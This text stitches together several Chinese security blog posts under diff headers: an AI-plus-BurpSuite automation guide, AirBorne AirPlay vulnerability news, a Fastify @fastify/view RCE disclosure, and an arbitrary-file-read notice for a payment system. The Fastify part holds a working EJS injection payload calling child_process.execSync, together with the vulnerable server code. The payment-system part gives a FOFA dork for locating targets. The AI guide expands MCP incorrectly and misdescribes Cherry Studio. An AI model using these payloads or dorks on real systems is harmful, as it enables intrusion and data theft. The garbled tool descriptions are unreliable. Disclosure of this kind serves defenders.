原创 lemonlove7 鹏组安全 2025-05-06 02:18
### 由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
![图片](https://mmbiz.qpic.cn/sz_mmbiz_jpg/0YvAy5BgkyNJe4vC6qtyDX3vcGgiameZcOwiaYlDgwuutJUicHD1ZWicn2T6WTuuiaLvsAcnHBq2a4f6LkwqGtGOuxw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
一、前言
    在网络安全领域漏洞检测是一项至关重要且复杂的工作。随着Web应用规模的扩大和攻击手段的多样化传统的人工检测方式已难以应对日益增长的安全需求。近年来人工智能AI技术的快速发展为自动化漏洞检测提供了新的可能性。
    本文将介绍一种基于**Cherry Studio**
平台的自动化漏洞检测方案,通过其内置的**MCPMission Control Protocol服务**
实现AI模型对BurpSuite
工具的智能调度与控制从而完成高效的Web应用漏洞自动化检测。
## 二、Cherry Studio与MCP服务简介
### 1. Cherry Studio
Cherry Studio 是一款专注于网络安全研究与开发的集成化平台,具有以下特点:
- **工具集成**
支持BurpSuite、Nmap、Metasploit等主流安全工具的快速接入。
- **灵活接口**
提供REST API和SDK便于开发者扩展自定义功能。
- **可视化操作**
:内置任务编排界面,降低安全测试的复杂度。
### 2. MCPMission Control Protocol服务
MCP 是Cherry Studio的核心调度模块主要功能包括
- **指令转换**
将AI生成的JSON指令转换为BurpSuite可识别的API调用。
- **任务管理**
监控BurpSuite的扫描状态处理异常情况如崩溃恢复
- **数据中转**
在AI与BurpSuite之间建立双向通信确保检测流程的闭环优化。
## 三、BurpSuite概述
BurpSuite 是业界广泛使用的Web应用安全测试工具主要功能包括
- **代理拦截**
实时捕获和修改HTTP/HTTPS请求。
- **漏洞扫描**
自动化检测SQL注入、XSS、CSRF等常见漏洞。
- **扩展支持**
支持Python、Ruby等脚本扩展便于定制化检测逻辑。
在传统渗透测试中BurpSuite依赖安全专家手动操作而结合AI后可实现智能化、自动化的漏洞挖掘。
## 四、AI驱动BurpSuite的自动化漏洞检测原理
### 1. AI模型训练
- **数据集**
使用标注的Web漏洞样本如OWASP Benchmark训练AI模型使其学习漏洞特征如SQL注入的Payload模式
- **算法选择**
采用深度学习如LSTM、Transformer结合强化学习RL优化漏洞检测策略。
### 2. 指令生成
AI模型分析目标Web应用如URL结构、输入参数生成BurpSuite可执行的指令包括
- **扫描策略**
(如主动扫描、被动扫描)
- **请求修改规则**
(如注入点探测)
- **漏洞检测脚本**
如自定义SQLi检测逻辑
### 3. MCP服务调度
MCP 接收AI指令后执行以下操作
1. **协议转换**
将AI指令适配BurpSuite API。
1. **任务下发**
启动BurpSuite扫描并监控其执行状态。
1. **异常处理**
如遇BurpSuite崩溃自动重启并恢复进度。
### 4. BurpSuite执行与反馈
BurpSuite 根据指令执行扫描并将结果如漏洞报告、HTTP日志实时返回MCP服务。
### 5. AI优化与报告生成
- **模型迭代**
AI分析检测结果优化扫描策略如调整Payload或探测深度
- **可视化报告**
:自动生成漏洞报告,包含风险等级、修复建议等。
## 五、具体实施步骤
### Cherry Studio 平台下载地址
###     Cherry Studio 官方网站 全能的AI助手:https://www.cherry-ai.com/download
环境搭建
    安装 Cherry Studio 平台配置AI的key并确保其正常运行这里我用的DeepSeek-硅基流动的api
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNrKn6cOtLGP35o0NgDiaJL44Rqzsq2Eh43Je93eHFFIcSfktuZoHrapvvlkWseJVltUtIsNPU32Yw/640?wx_fmt=png&from=appmsg "")
      安装并配置 BurpSuite 工具确保其能够正常启动和工作并且已安装必要的扩展插件插件为MCP server
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNrKn6cOtLGP35o0NgDiaJL4GRNt1PP3Nzy3dnmZYPD8eia2xF8mMtIGVBhHVvS5Z4TZwicFiaPn7BQSw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNrKn6cOtLGP35o0NgDiaJL4R5gwZgRZbM8VjO9uslPtpleANFjkKbF3icz38FHMv1sicNQJm1sBaic9w/640?wx_fmt=png&from=appmsg "")
在 Cherry Studio 中配置好 MCP 服务的相关参数如监听端口、BurpSuite 工具路径、通信协议等,以便建立与 BurpSuite 的连接。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNrKn6cOtLGP35o0NgDiaJL4icRq38MtKVWmpBw1aBfjoJWNDJo7BgIdwialkia4nLCOnDhYGeYvdYqvg/640?wx_fmt=png&from=appmsg "")
### AI 模型集成
###     将训练好的 AI 模型导入 Cherry Studio 平台,与 MCP 服务进行对接和通信配置,确保 AI 模型能够将生成的指令准确无误地发送给 MCP 服务。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNrKn6cOtLGP35o0NgDiaJL4cqRPOzYqIBico9Q2wE99b2OMribaYVwQdLg9WfYs2z6R8mFlUOFccFUA/640?wx_fmt=png&from=appmsg "")
###     测试 AI 模型与 MCP 服务之间的通信是否正常,通过发送简单的测试指令,观察 MCP 服务是否能够正确接收并转发给 BurpSuite。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNrKn6cOtLGP35o0NgDiaJL4APmnx6pWFGplzeYvoQibKsuvqpCOn3QpVTjFiciavJhljsFzYJlRhf2Jw/640?wx_fmt=png&from=appmsg "")
### 设置漏洞检测任务
    使用 Cherry Studio 的界面或编写脚本,向 AI 模型输入待检测 Web 应用的相关信息,包括但不限于目标 URL、登录凭证如果需要、特定的检测范围和要求等。
    AI 模型根据输入的信息开始生成针对 BurpSuite 的操作指令,并将其发送给 MCP 服务。
**执行与监控**
    MCP 服务将 AI 指令转发给 BurpSuite 后,启动漏洞检测任务。通过 Cherry Studio 的监控功能或 BurpSuite 自带的界面,实时观察漏洞检测的执行进度、当前状态、已拦截的请求数量、发现的潜在漏洞数量等信息。
    如果在检测过程中发现任何异常情况如网络连接中断、BurpSuite 报错等),及时暂停或终止任务,检查问题原因并进行相应的处理。
**结果分析与报告生成**
    漏洞检测任务完成后BurpSuite 将检测结果反馈给 MCP 服务MCP 服务将其传递给 AI 模型。AI 模型对结果进行详细的分析和处理,提取关键的漏洞信息,如漏洞类型、位置、影响程度、修复建议等。
    基于 AI 分析的结果,生成漏洞检测报告,报告内容可以包括漏洞的详细列表、每个漏洞的描述和截图、修复方案的详细说明、安全评估等级等,以直观、清晰的方式呈现给用户或安全团队,便于他们了解 Web 应用的安全状况并采取相应的修复措施。
## 六、案例展示
## SQL 注入漏洞检测案例
**场景描述**
 :某靶场存在 SQL 注入漏洞,使用上述 AI 指挥 BurpSuite 自动化检测方案进行检测。
检测过程
 AI 模型根据输入的 Web 应用 和 URL相关参数生成指令让 BurpSuite 拦截该应用的 HTTP 请求,通过构造特定的 SQL 注入测试语句并将这些语句插入到请求的参数中模拟恶意用户攻击行为然后BurpSuite将修改后的请求发送给服务器并分析服务器返回的响应结果判断是否存在 SQL 注入漏洞。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNrKn6cOtLGP35o0NgDiaJL4rxtvy2FA6xWQoShr2PtBj8A49zV0N1l82bScs7aUhI4V4ALLrx1Npw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNrKn6cOtLGP35o0NgDiaJL40ibP3LjIn4znzWMyEib97HLVdcPC55j4IEDreicZdZJfnSOLMTluP8bVQ/640?wx_fmt=png&from=appmsg "")
在日常攻防演练中如果存在大量资产则可以使用AI+burp对资产进行指纹识别和历史漏洞探测+弱口令检测,省去一大笔时间,非常方便实用。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNrKn6cOtLGP35o0NgDiaJL49I2A2PUHbEDLeQuwzqYlBfscnibl9wibucebTcQzM2UnKBv58iaCwxLicQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNrKn6cOtLGP35o0NgDiaJL48RyTGlDxcEhSRwufaPhQibicnWrWX794BkrNZ9ibpUP5SY12LYDyzDPYA/640?wx_fmt=png&from=appmsg "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNHF1CWPJ9XSApBFhIGwF5Jh0zD2ySOcHvBkYgicU4xZsqvR3XEjUEnfGKH7ya8TgqCibHpYZKcibDBQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**扫码关注**
**社区**
鹏组安全社区:
comm.pgpsec.cn
专注网络技术与骇客的一个综合性技术性交流与资源分享社区
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyN92OtiagxgUpDAeq8RbcPacH8L82CwLzHtvucDrP1RrgfzeUYY8cS4WHk8niap3jKZzys9wK5oHB9w/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
渗透测试工具箱
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNpkpFgujbn9mggiaJFKVwCUsIJSmTmdYeicjEeXI5D0BsnhVhoN1J0utVTh13scPl1BibVl0DL9aKmA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyNpkpFgujbn9mggiaJFKVwCUuQZTicZgpNYl9bNH5AZ9LS0lGDuqZbsXGL0256vJbbiaRysUuqaFThIw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
魔改开发的一些工具
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyPc0EZkuPiaicYGj6RAIr1ujGibwXueOIaTCKDt3o9exMmxcIWZ7tXicTVNwEhGPqcDFvUeblmTmM1ajw/640?wx_fmt=png&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
社区中举办的活动列表
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyN92OtiagxgUpDAeq8RbcPacMia7NDpiagkVUILjzUYrd09EYq1aLRAibTRoszh0HrGfJEBibJIZibicBwsw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/0YvAy5BgkyN92OtiagxgUpDAeq8RbcPacMia7NDpiagkVUILjzUYrd09EYq1aLRAibTRoszh0HrGfJEBibJIZibicBwsw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
免责声明
由于传播、利用本公众号鹏组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号鹏组安全及作者不为
承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

View File

@ -0,0 +1,39 @@
# 苹果“AirBorne”漏洞可能导致零点击 AirPlay RCE 攻击
胡金鱼 嘶吼专业版 2025-05-06 06:00
![](https://mmbiz.qpic.cn/mmbiz_gif/wpkib3J60o297rwgIksvLibPOwR24tqI8dGRUah80YoBLjTBJgws2n0ibdvfvv3CCm0MIOHTAgKicmOB4UHUJ1hH5g/640?wx_fmt=gif "")
苹果的AirPlay协议和AirPlay软件开发工具包SDK中的一系列安全漏洞使未打补丁的第三方和苹果设备暴露于各种攻击中包括远程代码执行。
网络安全公司Oligo Security的安全研究人员发现并报告了这些漏洞他们可以利用零点击和一键式RCE攻击、中间人MITM攻击和拒绝服务DoS攻击以及绕过访问控制列表ACL和用户交互获得敏感信息的访问权限并读取任意本地文件。
Oligo向苹果披露了23个安全漏洞苹果于3月31日发布了针对iphone和ipad iOS 18.4和iPadOS 18.4、mac macOS Ventura 13.7.5、macOS Sonoma 14.7.5和macOS Sequoia 15.4和Apple Vision Pro visionOS 2.4设备的安全更新来解决这些漏洞统称为“AirBorne”
该公司还修补了AirPlay音频SDK、AirPlay视频SDK和CarPlay通信插件。
虽然
“AirBorne”
漏洞只能被攻击者通过无线网络或点对点连接在同一网络上利用但它们允许接管易受攻击的设备并使用访问作为启动台来破坏同一网络上其他启用airplay的设备。
Oligo的安全研究人员表示他们能够证明攻击者可以使用两个安全漏洞CVE-2025-24252和CVE-2025-24132来创建可蠕虫的零点击RCE漏洞。
此外CVE-2025-24206用户交互绕过漏洞允许威胁者绕过AirPlay请求的“接受”点击要求并可以与其他漏洞链接以发起零点击攻击。
这意味着攻击者能够控制某些支持 AirPlay 的设备,并实施诸如部署恶意软件之类的操作,这种恶意软件会传播到受感染设备所连接的任何本地网络中的设备。这可能会导致与间谍活动、勒索软件、供应链攻击等相关的其他复杂攻击的发生。
由于 AirPlay 是苹果设备Mac、iPhone、iPad、Apple TV 等)以及利用 AirPlay 软件开发工具包的第三方设备的一项基础软件,这类漏洞可能会产生深远的影响。
网络安全公司建议用户应立即把所有企业苹果设备和启用 AirPlay 的设备更新到最新软件版本,并要求员工也更新他们所有的个人 AirPlay 设备。
用户还可以采取以下措施来缩小攻击面:将所有苹果设备更新至最新版本;若不使用,禁用 AirPlay 接收器;通过防火墙规则限制仅允许受信任设备访问 AirPlay仅允许当前用户使用 AirPlay 以缩小攻击面。
苹果公司称,全球活跃的苹果设备(包括 iPhone、iPad、Mac 以及其他设备)超过 23.5 亿台,而 Oligo 估计,还有数千万台支持 AirPlay 的第三方音频设备,如扬声器和电视,这还不包括支持 CarPlay 的汽车信息娱乐系统。
参考及来源:
https://www.bleepingcomputer.com/news/security/apple-airborne-flaws-can-lead-to-zero-click-airplay-rce-attacks/
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wpkib3J60o2ibaTFU29SJNJBHkSkiaOibpzsCl5icnPrcXIsxmX5WS06UNc46jc5XSicpJCjK5DeqozJbtg7ft5SlAZQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wpkib3J60o2ibaTFU29SJNJBHkSkiaOibpzsbx1Pzfgzgetb7BSCmFad21iamrHG5E7Zib7Sbyh5QhmAiaZV6jc4eWBiaw/640?wx_fmt=png&from=appmsg "")

View File

@ -0,0 +1,137 @@
# 通过@fastify/view raw 渲染实现远程代码执行
Ots安全 2025-05-06 06:25
![](https://mmbiz.qpic.cn/mmbiz_gif/bL2iaicTYdZn7gtxSFZlfuCW6AdQib8Q1onbR0U2h9icP1eRO6wH0AcyJmqZ7USD0uOYncCYIH7ZEE8IicAOPxyb9IA/640?wx_fmt=gif "")
供应商: Fastify
组件: @fastify/view
影响远程代码执行RCE
发现者: Oblivionsage
供应商确认:是(通过 HackerOne 上的公开评论)
> 截至 2025 年 5 月Fastify 已更新其文档并发出明确警告:
>
> 请勿将原始内容与不受信任的内容一起使用否则您将容易受到远程代码执行RCE攻击。
>
> GitHub PRfastify/point-of-view#475
漏洞摘要
Fastify 的@fastify/view插件允许使用 进行原始模板渲染raw: true。当与EJS
和不受信任的用户输入 一起使用时,将导致远程代码执行。
Fastify 自己的测试文件在没有警告的情况下展示了这种使用模式,
这可能会误导开发人员相信危险行为。
远程代码执行RCE
@fastify/view插件与 EJS 引擎和reply.view({ raw: <user-controlled-string> })相关模式配合使用时,允许任意 EJS 执行。当攻击者能够控制raw传递给视图渲染器的内容时这会导致远程代码执行 (RCE)。此漏洞源于 Fastify 信任未经任何清理或限制的原始模板字符串,并将其直接传递给 EJS 的compile()方法。
这是实际使用的有效载荷的最小示例:
```
curl -X POST http://localhost:3000/render \  -H "Content-Type: application/x-www-form-urlencoded" \  --data-urlencode 'text=<%= require("child_process").execSync("id").toString() %>'
```
输出:
```
uid=1000(nullprophet) gid=1000(nullprophet) groups=...
```
截屏curl.png
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48tadibXd1zjP4OqYagU8JzasTMvibSAlDg4u5ByJfl7hdTBIG1bKUAocuoFXhbOdGQRcLqKvejyjD4T7w/640?wx_fmt=png&from=appmsg "")
这通过模板逻辑证实了完整的 RCE — 与您的官方示例相匹配例如reply.view({ raw }))。
这将在服务器上执行任意命令并返回结果。服务器端代码默认不包含此逻辑——它只是将不受信任的输入传递给rawEJS 上下文。
该漏洞的工作原理如下:
我们复制了文档中提到的模式,并允许通过 POST /render 进行原始 EJS 注入。以下是使用的 PoC 服务器代码:
```
// Based on official Fastify repo usage of raw templates:// https://github.com/fastify/point-of-view/blob/master/test/test-ejs.jsconst fastify = require('fastify')();const ejs = require('ejs');const formBody = require('@fastify/formbody');const view = require('@fastify/view');fastify.register(formBody); // Needed to parse POST x-www-form-urlencodedfastify.register(view, {  engine: { ejs }});// Renders raw EJS passed via POST parameter 'text'fastify.post('/render', (req, reply) => {const template = req.body.text;// Pass 'require' to the template contextreturn reply.view({ raw: template }, { require }, { async: false });});fastify.listen({ port: 3000 }, err => {if (err) throw err;console.log('Listening on http://localhost:3000');});
```
基于 Fastify 自己的示例代码
该设置直接基于 Fastify 官方point-of-view仓库中的真实示例。具体如下
```
https://github.com/fastify/point-of-view/blob/master/test/test-ejs.jsreply.view({ raw: fs.readFileSync('./templates/index.ejs', 'utf8') }, data)
```
在我们的 PoC 中,我们使用了这种方法:
```
reply.view({ raw: template }, { require }, { async: false });
```
这种用法raw存在于代码库的多个地方包括README.md、测试文件和示例模板。
依恋:
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48tadibXd1zjP4OqYagU8JzasTMiacZMbPRLHo9o4U6CCcUPtiaZia2bhGjETWBhgEKZxIUib1CXAoJgIPhDg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rWGOWg48tadibXd1zjP4OqYagU8JzasTMOUTMmX48jo1VHGpH0aNlBOWwW0hf8MvmGs7C5rWSicg4Kf1F65bsOIA/640?wx_fmt=png&from=appmsg "")
为什么这很重要
这里需要关注的不是 Fastify 本身执行命令,而是 Fastify 的视图插件:
接受无限制的原始模板输入
编译并执行,无任何警告或清理
允许开发人员在使用此模式时不知不觉地将自己暴露于 RCE
这种行为正是导致模板注入在现代应用程序中存在风险的原因。
供应商回应:
Fastify 团队承认存在风险,但选择不应用代码级补丁。
随后Fastify 更新了其官方文档,明确警告使用不受信任的原始输入的危险:
“请勿将原始内容与不受信任的内容一起使用否则您将容易受到远程代码执行RCE攻击。
GitHub PRfastify/point-of-view[#475]()
— Fastify 文档2025 年 5 月)。
> ⚠️此 PoC 仅用于合法安全研究。请勿在您不拥有或未获得明确测试许可的系统上使用它。
感谢您抽出
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycNnFvFYVgXoExRy0gqCkqvrAghf8KPXnwQaYq77HMsjcVka7kPcBDQw/640?wx_fmt=gif "")
.
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycd5KMTutPwNWA97H5MPISWXLTXp0ibK5LXCBAXX388gY0ibXhWOxoEKBA/640?wx_fmt=gif "")
.
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycU99fZEhvngeeAhFOvhTibttSplYbBpeeLZGgZt41El4icmrBibojkvLNw/640?wx_fmt=gif "")
来阅读本文
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWge7Mibiad1tV0iaF8zSD5gzicbxDmfZCEL7vuOevN97CwUoUM5MLeKWibWlibSMwbpJ28lVg1yj1rQflyQ/640?wx_fmt=gif "")
**点它,分享点赞在看都在这里**

View File

@ -0,0 +1,111 @@
# 龙腾码支付 curl 任意文件读取漏洞
Superhero Nday Poc 2025-05-06 06:59
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkYN4sZibCVo6EFo0N9b7Kib4I4N6j6Y10tynLOdgov9ibUmaNwW5yeoCbQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkhic5lbbPcpxTLtLccZ04WhwDotW7g2b3zBgZeS5uvFH4dxf0tj0Rutw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![图片](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCk524CiapZejYicic1Hf8LPt8qR893A3IP38J3NMmskDZjyqNkShewpibEfA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的
POC
信息及
POC对应脚本
而造成的任何直接或者间接的后果及损失均由使用者本人负责公众号Nday Poc及作者不为此承担任何责任一旦造成后果请自行承担
**01**
**漏洞概述**
龙腾码支付 /pay/service/curl 接口处存在任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
**02******
**搜索引擎**
FOFA:
```
body="/epaydoc/epaydoc.php" && body="/sdk"
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tuTeyBvlicOdg28aNZ8fMcIlR8fKa0SLkLmDiaOSKeXE2ZCL3icopmPbCjA/640?wx_fmt=png&from=appmsg "")
**03******
**漏洞复现**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tuQSnE2bub54pK317yZesV7UkI3tNQWZNWjSXA5RS4sA6WzicL1JoUtPQ/640?wx_fmt=png&from=appmsg "")
**04**
**自查工具**
nuclei
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tuf0wEloQOr56Kl37icCe8GInkdaBeSU0vWMPGOy8qjJBKI44mZdDcv1g/640?wx_fmt=png&from=appmsg "")
afrog
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tu0ohlzL1kOFiaRxgq8puialM4icOCNtb5iaZvZGOwMChBbOqG9YE1zCN3NQ/640?wx_fmt=png&from=appmsg "")
xray
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwJJ9uEr7oQswWxEoSoPt1tu1j3FibxMicTWSMHYdRVzf6AmPgfYtGHc7ukeaLRXibXNJODHU6uc79icqg/640?wx_fmt=png&from=appmsg "")
**05******
**修复建议**
1、关闭互联网暴露面或接口设置访问权限
2、
升级至安全版本
**06******
**内部圈子介绍**
【Nday漏洞实战圈】🛠 
专注公开1day/Nday漏洞复现
 · 工具链适配支持
 ✧━━━━━━━━━━━━━━━━✧ 
🔍 资源内容
 ▫️ 整合全网公开
1day/Nday
漏洞POC详情
 ▫️ 适配Xray/Afrog/Nuclei检测脚本
 ▫️ 支持内置与自定义POC目录混合扫描 
🔄 更新计划 
▫️ 每周新增7-10个实用POC来源公开平台 
▫️ 所有脚本经过基础测试,降低调试成本 
🎯 适用场景 
▫️ 企业漏洞自查 ▫️ 渗透测试 ▫️ 红蓝对抗 
▫️ 安全运维
✧━━━━━━━━━━━━━━━━✧ 
⚠️ 声明:仅限合法授权测试,严禁违规使用!
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwI0beBCCyKGykkAazuPyvibgC0ooBGy9elQQ72f1WIB73UDYuPhx8cnCobvnOBdTcxmdwBbt2eAYIQ/640?wx_fmt=png&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")